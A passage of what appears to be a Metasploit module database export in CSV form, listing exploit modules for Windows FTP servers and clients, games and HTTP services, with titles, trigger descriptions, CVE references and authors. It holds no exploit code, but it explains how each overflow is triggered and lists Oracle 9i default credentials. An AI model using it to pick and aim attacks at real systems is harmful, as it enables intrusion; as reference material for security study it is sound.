www.appsec.ch","Metasploit Framework License (BSD)","t","2006-07-19 00:00:00",0,,"aggressive","t","BID-19065, CVE-2006-3726, OSVDB-27389","Jacopo Cervini" 717,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/filewrangler_list_reply.rb","exploit","windows/ftp/filewrangler_list_reply","exploit/windows/ftp/filewrangler_list_reply","FileWrangler 5.30 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the FileWrangler client that is triggered when the client connects to an FTP server and lists the directory contents, containing an overly long directory name.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 718,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freefloatftp_user.rb","exploit","windows/ftp/freefloatftp_user","exploit/windows/ftp/freefloatftp_user","Free Float FTP Server USER Command Buffer Overflow",300,"Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"aggressive","t","EDB-23243, OSVDB-69621","D35m0nd142, Doug Prostko " 719,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freefloatftp_wbem.rb","exploit","windows/ftp/freefloatftp_wbem","exploit/windows/ftp/freefloatftp_wbem","FreeFloat FTP Server Arbitrary File Upload",600,"This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) execute the payload uploaded.","Metasploit Framework License (BSD)","t","2012-12-07 00:00:00",0,,"passive","t","OSVDB-88302, OSVDB-88303, URL-http://metasploit.com","juan vazquez , sinn3r " 720,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freeftpd_user.rb","exploit","windows/ftp/freeftpd_user","exploit/windows/ftp/freeftpd_user","freeFTPd 1.0 Username Overflow",200,"This module exploits a stack buffer overflow in the freeFTPd multi-protocol file transfer service. 
This flaw can only be exploited when logging has been enabled (non-default).","Metasploit Framework License (BSD)","f","2005-11-16 00:00:00",,,"aggressive","t","BID-15457, CVE-2005-3683, OSVDB-20909, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html","MC " 721,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb","exploit","windows/ftp/ftpgetter_pwd_reply","exploit/windows/ftp/ftpgetter_pwd_reply","FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)",400,"This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client. When processing the response on a PWD command, a stack based buffer overflow occurs. This leads to arbitrary code execution when a structured exception handler gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68638, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , ekse" 722,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftppad_list_reply.rb","exploit","windows/ftp/ftppad_list_reply","exploit/windows/ftp/ftppad_list_reply","FTPPad 1.2.0 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in the FTPPad 1.2.0 ftp client. The overflow is triggered when the client connects to an FTP server which sends an overly long directory and filename in response to a LIST command. This will cause an access violation, and will eventually overwrite the saved extended instruction pointer. 
Payload can be found at EDX+5c and ESI+5c, so a little pivot/sniper was needed to make this one work.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r" 723,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb","exploit","windows/ftp/ftpshell51_pwd_reply","exploit/windows/ftp/ftpshell51_pwd_reply","FTPShell 5.1 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets triggered when the ftp client tries to process an overly long response to a PWD command. This will overwrite the saved EIP and structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68639, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 724,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpsynch_list_reply.rb","exploit","windows/ftp/ftpsynch_list_reply","exploit/windows/ftp/ftpsynch_list_reply","FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro version 4.0.73.274. The overflow gets triggered by sending an overly long filename to the client in response to a LIST command. The LIST command gets issued when doing a preview or when you have just created a new sync profile and allow the tool to see the differences. 
This will overwrite a structured exception handler and trigger an access violation.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , myne-us" 725,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/gekkomgr_list_reply.rb","exploit","windows/ftp/gekkomgr_list_reply","exploit/windows/ftp/gekkomgr_list_reply","Gekko Manager FTP Client Stack Buffer Overflow",400,"This module exploits a buffer overflow in Gekko Manager ftp client, triggered when processing the response received after sending a LIST request. If this response contains a long filename, a buffer overflow occurs, overwriting a structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68641, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 726,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/globalscapeftp_input.rb","exploit","windows/ftp/globalscapeftp_input","exploit/windows/ftp/globalscapeftp_input","GlobalSCAPE Secure FTP Server Input Overflow",500,"This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. 
A valid user account (or anonymous access) is required for this exploit to work.","BSD License","f","2005-05-01 00:00:00",0,,"aggressive","t","BID-13454, CVE-2005-1415, OSVDB-16049, URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html","Fairuzan Roslan , Mati Aharoni " 727,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/goldenftp_pass_bof.rb","exploit","windows/ftp/goldenftp_pass_bof","exploit/windows/ftp/goldenftp_pass_bof","GoldenFTP PASS Stack Buffer Overflow",200,"This module exploits a vulnerability in the Golden FTP service, using the PASS command to cause a buffer overflow. Please note that in order to trigger the vulnerable code, the victim machine must have the ""Show new connections"" setting enabled. By default, this option is unchecked.","Metasploit Framework License (BSD)","f","2011-01-23 00:00:00",,,"aggressive","t","BID-45957, CVE-2006-6576, EDB-16036, OSVDB-35951","Craig Freyman, Joff Thyer , bannedit " 728,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/httpdx_tolog_format.rb","exploit","windows/ftp/httpdx_tolog_format","exploit/windows/ftp/httpdx_tolog_format","HTTPDX tolog() Function Format String Vulnerability",500,"This module exploits a format string vulnerability in HTTPDX FTP server. By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.","Metasploit Framework License (BSD)","t","2009-11-17 00:00:00",0,,"aggressive","t","CVE-2009-4769, OSVDB-60181","jduck " 729,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/leapftp_list_reply.rb","exploit","windows/ftp/leapftp_list_reply","exploit/windows/ftp/leapftp_list_reply","LeapFTP 3.0.1 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the LeapFTP 3.0.1 client. 
This issue is triggered when a file with a long name is downloaded/opened.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68640, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 730,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/leapftp_pasv_reply.rb","exploit","windows/ftp/leapftp_pasv_reply","exploit/windows/ftp/leapftp_pasv_reply","LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow",300,"This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements.","Metasploit Framework License (BSD)","f","2003-06-09 00:00:00",0,,"passive","t","BID-7860, CVE-2003-0558, EDB-54, OSVDB-4587","patrick " 731,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb","exploit","windows/ftp/ms09_053_ftpd_nlst","exploit/windows/ftp/ms09_053_ftpd_nlst","Microsoft IIS FTP Server NLST Response Overflow",500,"This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)","Metasploit Framework License (BSD)","t","2009-08-31 00:00:00",0,,"aggressive","t","BID-36189, CVE-2009-3023, EDB-9541, MSB-MS09-053, OSVDB-57589","Kingcope , hdm " 732,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/netterm_netftpd_user.rb","exploit","windows/ftp/netterm_netftpd_user","exploit/windows/ftp/netterm_netftpd_user","NetTerm NetFTPD USER Buffer Overflow",500,"This module exploits a vulnerability in the NetTerm NetFTPD application. 
This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.","Metasploit Framework License (BSD)","f","2005-04-26 00:00:00",0,,"aggressive","t","BID-13396, CVE-2005-1323, OSVDB-15865, URL-http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html","hdm " 733,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/odin_list_reply.rb","exploit","windows/ftp/odin_list_reply","exploit/windows/ftp/odin_list_reply","Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)",400,"This module exploits a stack buffer overflow in Odin Secure FTP 4.1, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68824, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , rick2600" 734,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb","exploit","windows/ftp/oracle9i_xdb_ftp_pass","exploit/windows/ftp/oracle9i_xdb_ftp_pass","Oracle 9i XDB FTP PASS Overflow (win32)",500,"By passing an overly long string to the PASS command, a stack based buffer overflow occurs. 
David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","MC " 735,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb","exploit","windows/ftp/oracle9i_xdb_ftp_unlock","exploit/windows/ftp/oracle9i_xdb_ftp_unlock","Oracle 9i XDB FTP UNLOCK Overflow (win32)",500,"By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","David Litchfield , MC " 736,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/proftp_banner.rb","exploit","windows/ftp/proftp_banner","exploit/windows/ftp/proftp_banner","ProFTP 2.9 Banner Remote Buffer Overflow",300,"This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message.","Metasploit Framework License (BSD)","f","2009-08-25 00:00:00",0,,"passive","t","CVE-2009-3976, OSVDB-57394, URL-http://www.labtam-inc.com/index.php?act=products&pid=1","His0k4 " 737,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/quickshare_traversal_write.rb","exploit","windows/ftp/quickshare_traversal_write","exploit/windows/ftp/quickshare_traversal_write","QuickShare File Server 1.2.1 Directory Traversal Vulnerability",600,"This module exploits a vulnerability found in QuickShare File Server's FTP service. By supplying ""../"" in the file path, it is possible to trigger a directory traversal flaw, allowing the attacker to read a file outside the virtual directory. By default, the ""Writable"" option is enabled during account creation, therefore this makes it possible to create a file at an arbitrary location, which leads to remote code execution.","Metasploit Framework License (BSD)","f","2011-02-03 00:00:00",0,,"passive","t","EDB-16105, OSVDB-70776, URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/, URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html","modpr0be, sinn3r " 738,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ricoh_dl_bof.rb","exploit","windows/ftp/ricoh_dl_bof","exploit/windows/ftp/ricoh_dl_bof","Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",300,"This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. 
Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled).","Metasploit Framework License (BSD)","f","2012-03-01 00:00:00",0,,"aggressive","t","OSVDB-79691, URL-http://secunia.com/advisories/47912, URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/","Julien Ahrens, sinn3r " 739,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sami_ftpd_list.rb","exploit","windows/ftp/sami_ftpd_list","exploit/windows/ftp/sami_ftpd_list","Sami FTP Server LIST Command Buffer Overflow",100,"This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the ""Log"" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.","Metasploit Framework License (BSD)","f","2013-02-27 00:00:00",0,,"aggressive","t","BID-58247, EDB-24557, OSVDB-90815","Doug Prostko , superkojiman" 740,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sami_ftpd_user.rb","exploit","windows/ftp/sami_ftpd_user","exploit/windows/ftp/sami_ftpd_user","KarjaSoft Sami FTP Server v2.02 USER Overflow",300,"This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. 
When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.","Metasploit Framework License (BSD)","f","2006-01-24 00:00:00",,,"passive","t","BID-16370, BID-17835, BID-22045, CVE-2006-0441, CVE-2006-2212, EDB-1448, EDB-1452, EDB-1462, EDB-3127, EDB-3140, OSVDB-25670","patrick " 741,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sasser_ftpd_port.rb","exploit","windows/ftp/sasser_ftpd_port","exploit/windows/ftp/sasser_ftpd_port","Sasser Worm avserve FTP PORT Buffer Overflow",200,"This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten.","Metasploit Framework License (BSD)","f","2004-05-10 00:00:00",1,,"aggressive","t","OSVDB-6197","chamuco , patrick , valsmith " 742,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/scriptftp_list.rb","exploit","windows/ftp/scriptftp_list","exploit/windows/ftp/scriptftp_list","ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)",400,"AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. 
Social engineering of executing a specially crafted ftp file by double click will result in connecting to our malicious server and performing arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP.","Metasploit Framework License (BSD)","f","2011-10-12 00:00:00",0,,"passive","t","CVE-2011-3976, EDB-17876, OSVDB-75633, US-CERT-VU-440219","TecR0c , modpr0be, mr_me " 743,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/seagull_list_reply.rb","exploit","windows/ftp/seagull_list_reply","exploit/windows/ftp/seagull_list_reply","Seagull FTP v3.3 build 409 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the Seagull FTP client that gets triggered when the ftp client processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 744,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/servu_chmod.rb","exploit","windows/ftp/servu_chmod","exploit/windows/ftp/servu_chmod","Serv-U FTP Server < 4.2 Buffer Overflow",300,"This module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.","Metasploit Framework License (BSD)","t","2004-12-31 00:00:00",0,,"aggressive","t","BID-9483, CVE-2004-2111, OSVDB-3713","theLightCosine " 745,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/servu_mdtm.rb","exploit","windows/ftp/servu_mdtm","exploit/windows/ftp/servu_mdtm","Serv-U FTPD MDTM Overflow",400,"This is an exploit for the Serv-U's MDTM command timezone overflow. 
It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution.","Metasploit Framework License (BSD)","f","2004-02-26 00:00:00",0,,"aggressive","t","BID-9751, CVE-2004-0330, OSVDB-4073, URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html, URL-http://www.cnhonker.com/advisory/serv-u.mdtm.txt, URL-http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54","spoonm " 746,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/slimftpd_list_concat.rb","exploit","windows/ftp/slimftpd_list_concat","exploit/windows/ftp/slimftpd_list_concat","SlimFTPd LIST Concatenation Overflow",500,"This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. 
This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo.","BSD License","f","2005-07-21 00:00:00",0,,"aggressive","t","BID-14339, CVE-2005-2373, OSVDB-18172","Fairuzan Roslan " 747,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/trellian_client_pasv.rb","exploit","windows/ftp/trellian_client_pasv","exploit/windows/ftp/trellian_client_pasv","Trellian FTP Client 3.01 PASV Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message.","Metasploit Framework License (BSD)","f","2010-04-11 00:00:00",0,,"passive","t","CVE-2010-1465, EDB-12152, OSVDB-63812","dookie, zombiefx" 748,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/turboftp_port.rb","exploit","windows/ftp/turboftp_port","exploit/windows/ftp/turboftp_port","Turbo FTP Server 1.30.823 PORT Overflow",500,"This module exploits a buffer overflow vulnerability found in the PORT command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote code execution under the context of SYSTEM.","Metasploit Framework License (BSD)","f","2012-10-03 00:00:00",0,,"aggressive","t","EDB-22161, OSVDB-85887","Lincoln, Zhao Liang, corelanc0d3r, thelightcosine" 749,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/vermillion_ftpd_port.rb","exploit","windows/ftp/vermillion_ftpd_port","exploit/windows/ftp/vermillion_ftpd_port","Vermillion FTP Daemon PORT Command Memory Corruption",500,"This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. 
Processing is done using a source pointer (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the destination pointer. If an ASCII digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using ""vftpd.exe install"". If so, the service does not restart automatically, giving an attacker only one attempt.","Metasploit Framework License (BSD)","t","2009-09-23 00:00:00",0,,"aggressive","t","EDB-11293, OSVDB-62163, URL-http://www.global-evolution.info/news/files/vftpd/vftpd.txt","jduck " 750,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/warftpd_165_pass.rb","exploit","windows/ftp/warftpd_165_pass","exploit/windows/ftp/warftpd_165_pass","War-FTPD 1.65 Password Overflow",200,"This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. 
A failed attempt will bring down the service completely.","BSD License","f","1998-03-19 00:00:00",0,,"aggressive","t","BID-10078, CVE-1999-0256, OSVDB-875, URL-http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html","hdm " 751,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/warftpd_165_user.rb","exploit","windows/ftp/warftpd_165_user","exploit/windows/ftp/warftpd_165_user","War-FTPD 1.65 Username Overflow",200,"This module exploits a buffer overflow found in the USER command of War-FTPD 1.65.","BSD License","f","1998-03-19 00:00:00",,,"aggressive","t","BID-10078, CVE-1999-0256, OSVDB-875, URL-http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html","Fairuzan Roslan " 752,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wftpd_size.rb","exploit","windows/ftp/wftpd_size","exploit/windows/ftp/wftpd_size","Texas Imperial Software WFTPD 3.23 SIZE Overflow",200,"This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.","Metasploit Framework License (BSD)","t","2006-08-23 00:00:00",0,,"aggressive","t","BID-19617, CVE-2006-4318, OSVDB-28134","MC " 753,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb","exploit","windows/ftp/wsftp_server_503_mkd","exploit/windows/ftp/wsftp_server_503_mkd","WS-FTP Server 5.03 MKD Overflow",500,"This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.","BSD License","f","2004-11-29 00:00:00",0,,"aggressive","t","BID-11772, CVE-2004-1135, OSVDB-12509","Reed Arvin , et " 754,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb","exploit","windows/ftp/wsftp_server_505_xmd5","exploit/windows/ftp/wsftp_server_505_xmd5","Ipswitch WS_FTP Server 5.05 XMD5 Overflow",200,"This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 
5.05.","Metasploit Framework License (BSD)","f","2006-09-14 00:00:00",0,,"aggressive","t","BID-20076, CVE-2006-4847, OSVDB-28939","MC " 755,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xftp_client_pwd.rb","exploit","windows/ftp/xftp_client_pwd","exploit/windows/ftp/xftp_client_pwd","Xftp FTP Client 3.0 PWD Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message.","Metasploit Framework License (BSD)","f","2010-04-22 00:00:00",0,,"passive","t","EDB-12332, OSVDB-63968","dookie, zombiefx" 756,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xlink_client.rb","exploit","windows/ftp/xlink_client","exploit/windows/ftp/xlink_client","Xlink FTP Client Buffer Overflow",300,"This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. When an overly long FTP server response is received by a client, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2009-10-03 00:00:00",0,,"passive","t","CVE-2006-5792, OSVDB-33969, URL-http://www.metasploit.com/, URL-http://www.xlink.com","MC " 757,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xlink_server.rb","exploit","windows/ftp/xlink_server","exploit/windows/ftp/xlink_server","Xlink FTP Server Buffer Overflow",400,"This module exploits a stack buffer overflow in Xlink FTP Server that comes bundled with Omni-NFS Enterprise 5.2. 
When an overly long FTP request is sent to the server, arbitrary code may be executed.","Metasploit Framework License (BSD)","t","2009-10-03 00:00:00",0,,"aggressive","t","CVE-2006-5792, OSVDB-58646, URL-http://www.metasploit.com/, URL-http://www.xlink.com","MC " 758,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/mohaa_getinfo.rb","exploit","windows/games/mohaa_getinfo","exploit/windows/games/mohaa_getinfo","Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow in the getinfo command of Medal Of Honor Allied Assault.","BSD License","f","2004-07-17 00:00:00",0,,"aggressive","t","BID-10743, CVE-2004-0735, EDB-357, OSVDB-8061","Jacopo Cervini" 759,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/racer_503beta5.rb","exploit","windows/games/racer_503beta5","exploit/windows/games/racer_503beta5","Racer v0.5.3 beta 5 Buffer Overflow",500,"This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.","Metasploit Framework License (BSD)","f","2008-08-10 00:00:00",0,,"aggressive","t","BID-25297, CVE-2007-4370, EDB-4283, OSVDB-39601","Trancek " 760,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/ut2004_secure.rb","exploit","windows/games/ut2004_secure","exploit/windows/games/ut2004_secure","Unreal Tournament 2004 ""secure"" Overflow (Win32)",400,"This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. 
The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.","BSD License","t","2004-06-18 00:00:00",0,,"aggressive","t","BID-10570, CVE-2004-0608, OSVDB-7217","stinko " 761,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/adobe_robohelper_authbypass.rb","exploit","windows/http/adobe_robohelper_authbypass","exploit/windows/http/adobe_robohelper_authbypass","Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",600,"This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-09-23 00:00:00",0,,"aggressive","t","CVE-2009-3068, OSVDB-57896, URL-http://www.intevydis.com/blog/?p=69, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-066","MC " 762,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/altn_securitygateway.rb","exploit","windows/http/altn_securitygateway","exploit/windows/http/altn_securitygateway","Alt-N SecurityGateway username Buffer Overflow",200,"Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the ""username"" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart, you'll only get one shot. However, it often survives a successful exploitation attempt.","Metasploit Framework License (BSD)","t","2008-06-02 00:00:00",0,,"aggressive","t","BID-29457, CVE-2008-4193, OSVDB-45854","jduck " 763,"2013-05-07 